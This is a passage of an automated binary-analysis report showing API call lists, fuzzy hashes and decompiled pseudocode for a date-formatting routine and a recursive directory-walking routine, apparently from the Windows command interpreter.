                                  APIs
                                    • Part of subcall function 0016269C: _get_osfhandle.MSVCRT ref: 001626A7
                                    • Part of subcall function 0016269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0015C5F8,?,?,?), ref: 001626B6
                                    • Part of subcall function 0016269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0015C5C6), ref: 001626D2
                                    • Part of subcall function 0016269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,00000002), ref: 001626E1
                                    • Part of subcall function 0016269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001626EC
                                    • Part of subcall function 0016269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0015C5C6), ref: 001626F5
                                  • _get_osfhandle.MSVCRT ref: 0015C601
                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,0015C5C6,?,?,?,?,?,?,?,?,?,?,?,?,?,0015C5C6), ref: 0015C60F
                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0018B980,000000A0,00000000,00000000,?,?,?,?,?), ref: 0015C67C
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?), ref: 0015C6DC
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0015C6E7
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                  • String ID:
                                  • API String ID: 2173784998-0
                                  • Opcode ID: 2def22700778daab17f6769f199694790ef5369b0575812c3c17472e594d6ddf
                                  • Instruction ID: bb7c2b3240767223b6e280bac1b3e10208f243e8898e52e796bae9399c4e3582
                                  • Opcode Fuzzy Hash: 2def22700778daab17f6769f199694790ef5369b0575812c3c17472e594d6ddf
                                  • Instruction Fuzzy Hash: 64818271A00218EFDB249FA8DC849BEBBB9EF48311F15402AF916E6650DB719D85CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00155AEF, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 367timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00155AEF(void* __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				signed int _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				intOrPtr _t89;
				void* _t90;
				signed int _t96;
				signed int _t97;
				void* _t100;
				void* _t101;
				void* _t110;
				void* _t111;
				signed short _t118;
				long _t128;
				short* _t130;
				void* _t136;
				signed int _t139;
				void* _t143;
				void _t145;
				void _t149;
				signed int _t157;
				signed int _t159;
				signed int _t161;
				int _t164;
				void* _t172;
				signed int _t173;
				signed int _t181;
				signed int _t185;
				void* _t186;
				void* _t189;
				intOrPtr _t197;
				signed int _t202;
				void* _t206;
				void* _t210;
				void* _t211;
				signed int _t212;
				void* _t213;

				_t78 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t78 ^ _t212;
				_t157 = _a4;
				_v364 = __edx;
				_v368 = _t157;
				_v360 = 1;
				if(__ecx != 0) {
					_t161 = 9;
					memcpy( &_v420, __ecx, _t161 << 2);
					_t213 = _t213 + 0xc;
					E00173C49( &_v420,  &_v376);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v376);
				}
				FileTimeToLocalFileTime( &_v376,  &_v384);
				FileTimeToSystemTime( &_v384,  &_v348);
				_v352 = 0;
				if( *0x193cc9 == 0) {
					_t194 = _v348 & 0x0000ffff;
					_t208 = _v346 & 0x0000ffff;
					_t206 = _v342 & 0x0000ffff;
					_v352 = _t194;
					if(_v364 == 0) {
						_t181 = 0x64;
						_t194 = _t194 % _t181;
						_v352 = _t194;
					}
					_t89 =  *0x17d540; // 0x0
					if(_t89 != 2) {
						if(_t89 == 1) {
							_t110 = _t208;
							_t208 = _t206;
							_t206 = _t110;
						}
					} else {
						_t111 = _t194;
						_t194 = _t206;
						_t206 = _t208;
						_v352 = _t194;
						_t208 = _t111;
					}
					_t164 =  *0x17d598; // 0x0
					if(_t164 >= 0x20) {
						_t90 =  *0x17d594; // 0x0
						goto L63;
					} else {
						_t90 = realloc( *0x17d594, 0x40);
						_pop(0);
						if(_t90 != 0) {
							_t194 = _v352;
							_t164 = 0x20;
							 *0x17d594 = _t90;
							 *0x17d598 = _t164;
							L63:
							_push(_t194);
							_push(0x17f80c);
							_push(_t206);
							_push(0x17f80c);
							E0016274C(_t90, _t164, L"%02d%s%02d%s%02d", _t208);
							_t213 = _t213 + 0x20;
							_t206 = 2;
							goto L35;
						}
						_push(_t90);
						goto L50;
					}
				} else {
					_v356 = 0;
					if(GetLocaleInfoW(E001641A4(), 0x1f,  &_v332, 0x80) == 0) {
						_t194 = 0x80;
						E00161040( &_v332, 0x80,  *0x17f7f8);
					}
					_t118 = _v332;
					_t210 =  &_v332;
					_t206 = 2;
					if(_t118 == 0) {
						L13:
						if(GetDateFormatW(E001641A4(), 0,  &_v348,  &_v332,  *0x17d594,  *0x17d598) == 0) {
							L32:
							_t208 = GetDateFormatW(E001641A4(), 0,  &_v348,  &_v332, 0, 0);
							if(_t208 == 0) {
								_t128 = GetLastError();
								_push(0);
								L48:
								 *0x193cf0 = _t128;
								_push(_t128);
								L51:
								E0015C5A2(0);
								_t97 = 0;
								L25:
								return E00166FD0(_t97, _t157, _v8 ^ _t212, _t194, _t206, _t208);
							}
							_t208 = _t208 + 1;
							_t130 = realloc( *0x17d594, _t208 + _t208);
							_pop(0);
							if(_t130 == 0) {
								_push(0);
								L50:
								_push(8);
								goto L51;
							}
							 *0x17d594 = _t130;
							 *0x17d598 = _t208;
							_t208 = 0;
							if(GetDateFormatW(E001641A4(), 0,  &_v348,  &_v332, _t130, 0) == 0) {
								_t128 = GetLastError();
								_push(0);
								goto L48;
							}
							L35:
							_t208 =  *0x17d594; // 0x0
							L15:
							_push(E00155AA7(_v344 & 0x0000ffff));
							_t194 = 0x20;
							E00161040( &_v76, _t194);
							if(_t157 == 0) {
								if(_v360 != 0) {
									if(E001568B5() == 0) {
										_push(_t208);
										_push( &_v76);
									} else {
										_push( &_v76);
										_push(_t208);
									}
									_t96 = E001625D9(L"%s %s ");
								} else {
									_push(_t208);
									_t96 = E001625D9(L"%s ");
								}
								_t157 = _t96;
								L24:
								_t97 = _t157;
								goto L25;
							}
							if(_v360 == 0 || _v364 != 1) {
								E00161040(_t157, _a8, _t208);
							} else {
								_t101 = E001568B5();
								_t197 = _a8;
								_t173 = _t157;
								if(_t101 != 0) {
									E00161040(_t173, _t197, _t208);
									E001618C0(_t157, _a8, " ");
									_push( &_v76);
								} else {
									E00161040(_t173, _t197,  &_v76);
									E001618C0(_t157, _a8, " ");
									_push(_t208);
								}
								E001618C0(_t157, _a8);
							}
							_t172 = _t157 + 2;
							_t194 = 0;
							do {
								_t100 =  *_t157;
								_t157 = _t206 + _t157;
							} while (_t100 != 0);
							_t157 = _t157 - _t172 >> 1;
							goto L24;
						}
						_t208 =  *0x17d594; // 0x0
						if(_t208 == 0) {
							goto L32;
						}
						goto L15;
					} else {
						_t159 = _v356;
						_t185 = _t118 & 0x0000ffff;
						_t136 = 0x64;
						do {
							if(_t185 == 0x27) {
								_t210 = _t210 + _t206;
								_t159 = 0 | _t159 == 0x00000000;
								goto L11;
							}
							if(_t159 != 0 || _t185 != _t136 && _t185 != 0x4d) {
								_t210 = _t210 + _t206;
							} else {
								_t202 = 0;
								do {
									_t210 = _t210 + _t206;
									_t202 = _t202 + 1;
								} while ( *_t210 == _t185);
								_v356 = _t210;
								_t211 = _t210 +  ~_t202 * 2;
								if(_t202 != 1) {
									_t143 = 0x64;
									if(_t185 == _t143) {
										_v360 = 0;
									}
									if(_t202 <= 3) {
										_t210 = _v356;
									} else {
										_t194 = _v356;
										_t186 = _t194;
										_v356 = _t186 + 2;
										do {
											_t145 =  *_t186;
											_t186 = _t186 + _t206;
										} while (_t145 != _v352);
										_t210 = _t211 + 6;
										memmove(_t210, _t194, 2 + (_t186 - _v356 >> 1) * 2);
										_t213 = _t213 + 0xc;
									}
									goto L11;
								}
								_t189 = _t211;
								_t194 = _t189 + 2;
								do {
									_t149 =  *_t189;
									_t189 = _t189 + _t206;
								} while (_t149 != _v352);
								memmove(_t211 + 2, _t211, 2 + (_t189 - _t194 >> 1) * 2);
								_t213 = _t213 + 0xc;
								_t210 = _t211 + 4;
							}
							L11:
							_t139 =  *_t210 & 0x0000ffff;
							_t185 = _t139;
							_t136 = 0x64;
						} while (_t139 != 0);
						_t157 = _v368;
						goto L13;
					}
				}
			}























































                                  0x00155afa
                                  0x00155b01
                                  0x00155b05
                                  0x00155b0b
                                  0x00155b11
                                  0x00155b17
                                  0x00155b24
                                  0x00169ae4
                                  0x00169aeb
                                  0x00169aeb
                                  0x00169af9
                                  0x00155b2a
                                  0x00155b31
                                  0x00155b45
                                  0x00155b45
                                  0x00155b59
                                  0x00155b6d
                                  0x00155b75
                                  0x00155b81
                                  0x00169bba
                                  0x00169bc1
                                  0x00169bc8
                                  0x00169bcf
                                  0x00169bdb
                                  0x00169be3
                                  0x00169be4
                                  0x00169be6
                                  0x00169be6
                                  0x00169bec
                                  0x00169bf4
                                  0x00169c09
                                  0x00169c0b
                                  0x00169c0d
                                  0x00169c0f
                                  0x00169c0f
                                  0x00169bf6
                                  0x00169bf6
                                  0x00169bf8
                                  0x00169bfa
                                  0x00169bfc
                                  0x00169c02
                                  0x00169c02
                                  0x00169c11
                                  0x00169c1a
                                  0x00169c4c
                                  0x00000000
                                  0x00169c1c
                                  0x00169c24
                                  0x00169c2b
                                  0x00169c2e
                                  0x00169c36
                                  0x00169c3e
                                  0x00169c3f
                                  0x00169c44
                                  0x00169c51
                                  0x00169c51
                                  0x00169c57
                                  0x00169c58
                                  0x00169c59
                                  0x00169c62
                                  0x00169c67
                                  0x00169c6c
                                  0x00000000
                                  0x00169c6c
                                  0x00169c30
                                  0x00000000
                                  0x00169c30
                                  0x00155b87
                                  0x00155b87
                                  0x00155baa
                                  0x00169b09
                                  0x00169b11
                                  0x00169b11
                                  0x00155bb0
                                  0x00155bb7
                                  0x00155bbf
                                  0x00155bc3
                                  0x00155c07
                                  0x00155c32
                                  0x00155d34
                                  0x00155d53
                                  0x00155d57
                                  0x00169b8d
                                  0x00169b95
                                  0x00169b9f
                                  0x00169b9f
                                  0x00169ba4
                                  0x00169bac
                                  0x00169bac
                                  0x00169bb3
                                  0x00155cca
                                  0x00155cda
                                  0x00155cda
                                  0x00155d5d
                                  0x00155d68
                                  0x00155d6f
                                  0x00155d72
                                  0x00169ba9
                                  0x00169baa
                                  0x00169baa
                                  0x00000000
                                  0x00169baa
                                  0x00155d7a
                                  0x00155d8c
                                  0x00155d93
                                  0x00155da4
                                  0x00169b98
                                  0x00169b9e
                                  0x00000000
                                  0x00169b9e
                                  0x00155daa
                                  0x00155daa
                                  0x00155c46
                                  0x00155c52
                                  0x00155c55
                                  0x00155c59
                                  0x00155c60
                                  0x00169c79
                                  0x00169c94
                                  0x00169c9a
                                  0x00169c9b
                                  0x00169c96
                                  0x00169c96
                                  0x00169c97
                                  0x00169c97
                                  0x00169ca1
                                  0x00169c7b
                                  0x00169c7b
                                  0x00169c81
                                  0x00169c87
                                  0x00169ca9
                                  0x00155cc8
                                  0x00155cc8
                                  0x00000000
                                  0x00155cc8
                                  0x00155c6d
                                  0x00169cd4
                                  0x00155c80
                                  0x00155c80
                                  0x00155c85
                                  0x00155c88
                                  0x00155c8c
                                  0x00169cb1
                                  0x00169cc0
                                  0x00169cc8
                                  0x00155c92
                                  0x00155c96
                                  0x00155ca5
                                  0x00155caa
                                  0x00155caa
                                  0x00155cb0
                                  0x00155cb0
                                  0x00155cb5
                                  0x00155cb8
                                  0x00155cba
                                  0x00155cba
                                  0x00155cbd
                                  0x00155cbf
                                  0x00155cc6
                                  0x00000000
                                  0x00155cc6
                                  0x00155c38
                                  0x00155c40
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00155bc5
                                  0x00155bc5
                                  0x00155bcd
                                  0x00155bd0
                                  0x00155bd1
                                  0x00155bd5
                                  0x00169b1d
                                  0x00169b24
                                  0x00000000
                                  0x00169b24
                                  0x00155bdd
                                  0x00155bf2
                                  0x00155cdd
                                  0x00155cdf
                                  0x00155ce1
                                  0x00155ce1
                                  0x00155ce3
                                  0x00155ce4
                                  0x00155ceb
                                  0x00155cf3
                                  0x00155cf9
                                  0x00169b2d
                                  0x00169b31
                                  0x00169b35
                                  0x00169b35
                                  0x00169b3e
                                  0x00169b82
                                  0x00169b40
                                  0x00169b40
                                  0x00169b46
                                  0x00169b4b
                                  0x00169b51
                                  0x00169b51
                                  0x00169b54
                                  0x00169b56
                                  0x00169b65
                                  0x00169b74
                                  0x00169b7a
                                  0x00169b7a
                                  0x00000000
                                  0x00169b3e
                                  0x00155cff
                                  0x00155d01
                                  0x00155d04
                                  0x00155d04
                                  0x00155d07
                                  0x00155d09
                                  0x00155d23
                                  0x00155d29
                                  0x00155d2c
                                  0x00155d2c
                                  0x00155bf4
                                  0x00155bf4
                                  0x00155bf9
                                  0x00155bfe
                                  0x00155bfe
                                  0x00155c01
                                  0x00000000
                                  0x00155c01
                                  0x00155bc3

                                  APIs
                                  • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0017F830,?,00002000), ref: 00155B31
                                  • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00155B45
                                  • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00155B59
                                  • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00155B6D
                                  • realloc.MSVCRT ref: 00169C24
                                    • Part of subcall function 001641A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00155BA1,0000001F,?,00000080), ref: 001641A4
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00155BA2
                                  • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 00155C2A
                                  • memmove.MSVCRT ref: 00155D23
                                  • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00155D4D
                                  • realloc.MSVCRT ref: 00155D68
                                  • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00155D9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                  • String ID: %02d%s%02d%s%02d$%s $%s %s
                                  • API String ID: 2927284792-4023967598
                                  • Opcode ID: 40986678e3cba661b071cf5188953179931b81f1f47e637523eb217a0443bf09
                                  • Instruction ID: 612ccaec23f44243bc4d81929e3421677ded8770b33db96a293ebb97d3a29794
                                  • Opcode Fuzzy Hash: 40986678e3cba661b071cf5188953179931b81f1f47e637523eb217a0443bf09
                                  • Instruction Fuzzy Hash: C0C1E571A00628DFDB249F64DC55AFA77BDEF89301F1440AAE80AEB250DB315ED5CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001585EA, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 378fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E001585EA(WCHAR* __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				struct _WIN32_FIND_DATAW _v1140;
				WCHAR* _v1144;
				long _v1148;
				void* _v1152;
				char _v1156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t104;
				short _t117;
				void* _t121;
				signed int _t122;
				signed int _t124;
				WCHAR* _t126;
				void* _t127;
				void* _t130;
				WCHAR* _t136;
				intOrPtr _t139;
				WCHAR* _t140;
				WCHAR* _t144;
				intOrPtr _t147;
				WCHAR* _t151;
				WCHAR* _t153;
				WCHAR* _t158;
				WCHAR* _t159;
				long _t160;
				long _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				WCHAR* _t168;
				WCHAR* _t169;
				void* _t173;
				void* _t177;
				long _t178;
				void* _t179;
				void* _t180;
				short* _t186;
				signed int _t188;
				long _t192;
				signed int _t193;
				signed int _t194;
				intOrPtr* _t197;
				signed int _t198;
				signed int _t199;
				intOrPtr* _t203;
				signed int _t205;
				WCHAR* _t207;
				char* _t208;
				char* _t209;
				long _t214;
				signed int _t220;
				WCHAR* _t221;
				signed int _t222;
				long _t223;
				signed int _t224;
				void* _t225;
				void* _t226;
				void* _t241;
				void* _t260;

				_t217 = __edx;
				_t104 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t104 ^ _t224;
				_v24 = 1;
				_t223 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t220 = __edx;
				_t176 = __ecx;
				_v1148 = __edx;
				_v1144 = __ecx;
				memset( &_v548, 0, 0x104);
				_t226 = _t225 + 0xc;
				if(E00160C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t223 = 8;
					goto L43;
				} else {
					 *_t220 = 1;
					_t221 = _t176;
					_t186 =  &(_t221[1]);
					do {
						_t117 =  *_t221;
						_t221 =  &(_t221[1]);
					} while (_t117 != 0);
					_t222 = _t221 - _t186;
					_t220 = _t222 >> 1;
					if(_t222 == 0) {
						_t223 = 0xa1;
						L43:
						__imp__??_V@YAXPAX@Z();
						return E00166FD0(_t223, _t176, _v8 ^ _t224, _t217, _t220, _t223, _v28);
					}
					if(_t220 + 3 > 0x7fe7) {
						L42:
						_t223 = E00158885(_t176);
						goto L43;
					}
					_t121 = FindFirstFileW(_t176,  &_v1140);
					if(_t121 == 0xffffffff) {
						_t122 = 0x10;
						_t188 = 0;
						_v1140.dwFileAttributes = _t122;
						_v1140.dwReserved0 = 0;
					} else {
						FindClose(_t121);
						_t188 = _v1140.dwReserved0;
						_t122 = _v1140.dwFileAttributes;
					}
					if((_t122 & 0x00000010) == 0) {
						goto L42;
					} else {
						if((_t122 & 0x00000400) != 0) {
							__eflags = _t188 & 0x20000000;
							if((_t188 & 0x20000000) != 0) {
								goto L42;
							}
						}
						E00160D89(_t217, _t176);
						_t124 =  *(_t176 + _t220 * 2 - 2) & 0x0000ffff;
						if(_t124 != 0x3a && _t124 != 0x5c) {
							E00160CF2(_t217, "\\");
							_t220 = _t220 + 1;
						}
						E00160CF2(_t217, "*");
						_t126 = _v28;
						if(_t126 == 0) {
							_t126 =  &_v548;
						}
						_t127 = FindFirstFileW(_t126,  &_v1140);
						_v1152 = _t127;
						if(_t127 == 0xffffffff) {
							goto L42;
						} else {
							while(1) {
								L14:
								_t241 =  *0x17d544 - _t223; // 0x0
								if(_t241 != 0) {
									break;
								}
								_t217 =  &(_v1140.cAlternateFileName);
								_t192 = _t217;
								_t177 = _t192 + 2;
								do {
									_t130 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t130 != _t223);
								_t193 = _t192 - _t177;
								_t194 = _t193 >> 1;
								if(_t193 != 0) {
									L21:
									if(_t194 + _t220 >= 0x7fe7) {
										_t176 = _v1144;
										_push(_t217);
										 *_v1148 = _t223;
										E0015C5A2(_t194, 0x400023da, 2, _v1144);
										L41:
										FindClose(_v1152);
										_t260 =  *0x17d544 - _t223; // 0x0
										if(_t260 != 0) {
											goto L43;
										}
										goto L42;
									}
									_t134 = _v28;
									if(_v28 == 0) {
										_t134 =  &_v548;
									}
									E00161040(_t134 + _t220 * 2, _v20 - _t220, _t217);
									_t178 = _v1140.dwFileAttributes;
									if((_t178 & 0x00000010) == 0) {
										__eflags = _t178 & 0x00000001;
										if((_t178 & 0x00000001) != 0) {
											_t207 = _v28;
											__eflags = _t207;
											if(_t207 == 0) {
												_t207 =  &_v548;
											}
											_t162 = _t178 & 0xfffffffe;
											__eflags = _t162;
											SetFileAttributesW(_t207, _t162);
										}
										_t196 = _v28;
										__eflags = _v28;
										if(_v28 == 0) {
											_t196 =  &_v548;
										}
										_t217 = _t178;
										_t136 = E001583F2(_t196, _t178);
										__eflags = _t136;
										if(_t136 == 0) {
											goto L39;
										} else {
											__eflags = _t136 - 0x4d3;
											if(_t136 == 0x4d3) {
												break;
											}
											__eflags = _t136 - 3;
											if(_t136 == 3) {
												_t158 = _v28;
												__eflags = _t158;
												if(_t158 == 0) {
													_t158 =  &_v548;
												}
												__imp___wcsnicmp(_t158, L"\\\\?\\", 4);
												_t226 = _t226 + 0xc;
												__eflags = _t158;
												if(_t158 != 0) {
													_t159 = _v28;
													__eflags = _t159;
													if(_t159 == 0) {
														_t159 =  &_v548;
													}
													_t160 = GetFullPathNameW(_t159, _t223, _t223, _t223);
													__eflags = _t160 - 0x7fe7;
													if(_t160 > 0x7fe7) {
														SetLastError(0x6f);
													}
												}
											}
											_t197 =  &(_v1140.cAlternateFileName);
											_t217 = _t197 + 2;
											do {
												_t139 =  *_t197;
												_t197 = _t197 + 2;
												__eflags = _t139 - _t223;
											} while (_t139 != _t223);
											_t140 = _v28;
											_t198 = _t197 - _t217;
											__eflags = _t198;
											_t199 = _t198 >> 1;
											if(_t198 == 0) {
												L86:
												__eflags = _t140;
												if(_t140 == 0) {
													_t140 =  &_v548;
												}
												E0015C5A2(_t199, 0x4000271b, 1, _t140);
												_t226 = _t226 + 0xc;
												L89:
												_push(_t223);
												_push(GetLastError());
												E0015C5A2(_t199);
												_t144 = _v28;
												__eflags = _t144;
												if(_t144 == 0) {
													_t144 =  &_v548;
												}
												SetFileAttributesW(_t144, _t178);
												 *_v1148 = _t223;
												goto L39;
											}
											__eflags = _t140;
											if(_t140 == 0) {
												_t140 =  &_v548;
											}
											__eflags = 0;
											_t140[_t220] = 0;
											_t203 =  &(_v1140.cFileName);
											_t217 = _t203 + 2;
											do {
												_t147 =  *_t203;
												_t203 = _t203 + 2;
												__eflags = _t147 - _t223;
											} while (_t147 != _t223);
											_t205 = _t203 - _t217 >> 1;
											_t199 =  &_v548;
											__eflags = _t205 + _t220 - 0x7fe7;
											if(_t205 + _t220 < 0x7fe7) {
												E00160CF2(_t217,  &(_v1140.cFileName));
												_t151 = _v28;
												__eflags = _t151;
												if(_t151 == 0) {
													_t151 =  &_v548;
												}
												E0015C5A2(_t199, 0x4000271b, 1, _t151);
												_t153 = _v28;
												_t226 = _t226 + 0xc;
												__eflags = _t153;
												if(_t153 == 0) {
													_t153 =  &_v548;
												}
												_t153[_t220] = 0;
												_t199 =  &_v548;
												E00160CF2(_t217,  &(_v1140.cAlternateFileName));
												goto L89;
											}
											E00160CF2(_t217,  &(_v1140.cAlternateFileName));
											_t140 = _v28;
											goto L86;
										}
									} else {
										_t208 = ".";
										_t164 =  &(_v1140.cFileName);
										_t179 = 4;
										while(1) {
											_t217 =  *_t164;
											if(_t217 !=  *_t208) {
												break;
											}
											if(_t217 == 0) {
												L29:
												_t165 = _t223;
												L30:
												if(_t165 == 0) {
													L39:
													if(FindNextFileW(_v1152,  &_v1140) != 0) {
														goto L14;
													}
													goto L40;
												}
												_t209 = L"..";
												_t166 =  &(_v1140.cFileName);
												while(1) {
													_t217 =  *_t166;
													if(_t217 !=  *_t209) {
														break;
													}
													if(_t217 == 0) {
														L36:
														_t167 = _t223;
														L38:
														if(_t167 != 0) {
															_t210 = _v28;
															__eflags = _v28;
															if(_v28 == 0) {
																_t210 =  &_v548;
															}
															_t217 =  &_v1156;
															_t168 = E001585EA(_t210,  &_v1156);
															__eflags =  *0x17d544 - _t223; // 0x0
															if(__eflags != 0) {
																goto L40;
															} else {
																__eflags = _t168;
																if(_t168 == 0) {
																	goto L39;
																}
																_t211 = _v1148;
																 *_v1148 = _t223;
																__eflags = _t168 - 0x91;
																if(_t168 != 0x91) {
																	L58:
																	_t169 = _v28;
																	__eflags = _t169;
																	if(_t169 == 0) {
																		_t169 =  &_v548;
																	}
																	E0015C5A2(_t211, 0x4000271b, 1, _t169);
																	_t226 = _t226 + 0xc;
																	_push(_t223);
																	_push(GetLastError());
																	E0015C5A2(_t211);
																	goto L39;
																}
																__eflags = _v1156 - _t223;
																if(_v1156 == _t223) {
																	goto L39;
																}
																goto L58;
															}
														}
														goto L39;
													}
													_t217 =  *((intOrPtr*)(_t166 + 2));
													_t47 =  &(_t209[2]); // 0x2e
													if(_t217 !=  *_t47) {
														break;
													}
													_t166 = _t166 + _t179;
													_t209 =  &(_t209[_t179]);
													if(_t217 != 0) {
														continue;
													}
													goto L36;
												}
												asm("sbb eax, eax");
												_t167 = _t166 | 0x00000001;
												__eflags = _t167;
												goto L38;
											}
											_t217 =  *((intOrPtr*)(_t164 + 2));
											_t44 =  &(_t208[2]); // 0x200000
											if(_t217 !=  *_t44) {
												break;
											}
											_t164 = _t164 + _t179;
											_t208 =  &(_t208[_t179]);
											if(_t217 != 0) {
												continue;
											}
											goto L29;
										}
										asm("sbb eax, eax");
										_t165 = _t164 | 0x00000001;
										goto L30;
									}
								}
								_t217 =  &(_v1140.cFileName);
								_t214 = _t217;
								_t180 = _t214 + 2;
								do {
									_t173 =  *_t214;
									_t214 = _t214 + 2;
								} while (_t173 != _t223);
								_t194 = _t214 - _t180 >> 1;
								goto L21;
							}
							L40:
							_t176 = _v1144;
							goto L41;
						}
					}
				}
			}





































































                                  0x001585ea
                                  0x001585f5
                                  0x001585fc
                                  0x00158607
                                  0x0015860c
                                  0x0015860e
                                  0x00158617
                                  0x0015861a
                                  0x0015861c
                                  0x00158620
                                  0x00158626
                                  0x0015862c
                                  0x00158639
                                  0x00158655
                                  0x00158882
                                  0x00000000
                                  0x0015865b
                                  0x0015865b
                                  0x00158661
                                  0x00158663
                                  0x00158666
                                  0x00158666
                                  0x00158669
                                  0x0015866c
                                  0x00158671
                                  0x00158673
                                  0x00158675
                                  0x001703bb
                                  0x00158859
                                  0x0015885c
                                  0x00158875
                                  0x00158875
                                  0x00158683
                                  0x00158850
                                  0x00158857
                                  0x00000000
                                  0x00158857
                                  0x00158691
                                  0x0015869a
                                  0x001703c7
                                  0x001703c8
                                  0x001703ca
                                  0x001703d0
                                  0x001586a0
                                  0x001586a1
                                  0x001586a7
                                  0x001586ad
                                  0x001586ad
                                  0x001586b5
                                  0x00000000
                                  0x001586bb
                                  0x001586c0
                                  0x001703db
                                  0x001703e1
                                  0x00000000
                                  0x00000000
                                  0x001703e7
                                  0x001586cd
                                  0x001586d2
                                  0x001586da
                                  0x001586ec
                                  0x001586f1
                                  0x001586f1
                                  0x001586fd
                                  0x00158702
                                  0x00158707
                                  0x001703ec
                                  0x001703ec
                                  0x00158715
                                  0x0015871b
                                  0x00158724
                                  0x00000000
                                  0x0015872a
                                  0x0015872a
                                  0x0015872a
                                  0x0015872a
                                  0x00158730
                                  0x00000000
                                  0x00000000
                                  0x00158736
                                  0x0015873c
                                  0x0015873e
                                  0x00158741
                                  0x00158741
                                  0x00158744
                                  0x00158747
                                  0x0015874c
                                  0x0015874e
                                  0x00158750
                                  0x0015876c
                                  0x00158774
                                  0x00170615
                                  0x0017061b
                                  0x00170624
                                  0x00170626
                                  0x0015883b
                                  0x00158842
                                  0x00158848
                                  0x0015884e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015884e
                                  0x0015877a
                                  0x0015877f
                                  0x001703f7
                                  0x001703f7
                                  0x0015878e
                                  0x00158793
                                  0x0015879c
                                  0x0017047a
                                  0x0017047d
                                  0x0017047f
                                  0x00170482
                                  0x00170484
                                  0x00170486
                                  0x00170486
                                  0x0017048e
                                  0x0017048e
                                  0x00170493
                                  0x00170493
                                  0x00170499
                                  0x0017049c
                                  0x0017049e
                                  0x001704a0
                                  0x001704a0
                                  0x001704a6
                                  0x001704a8
                                  0x001704ad
                                  0x001704af
                                  0x00000000
                                  0x001704b5
                                  0x001704b5
                                  0x001704ba
                                  0x00000000
                                  0x00000000
                                  0x001704c0
                                  0x001704c3
                                  0x001704c5
                                  0x001704c8
                                  0x001704ca
                                  0x001704cc
                                  0x001704cc
                                  0x001704da
                                  0x001704e0
                                  0x001704e3
                                  0x001704e5
                                  0x001704e7
                                  0x001704ea
                                  0x001704ec
                                  0x001704ee
                                  0x001704ee
                                  0x001704f8
                                  0x001704fe
                                  0x00170503
                                  0x00170507
                                  0x00170507
                                  0x00170503
                                  0x001704e5
                                  0x0017050d
                                  0x00170513
                                  0x00170516
                                  0x00170516
                                  0x00170519
                                  0x0017051c
                                  0x0017051c
                                  0x00170521
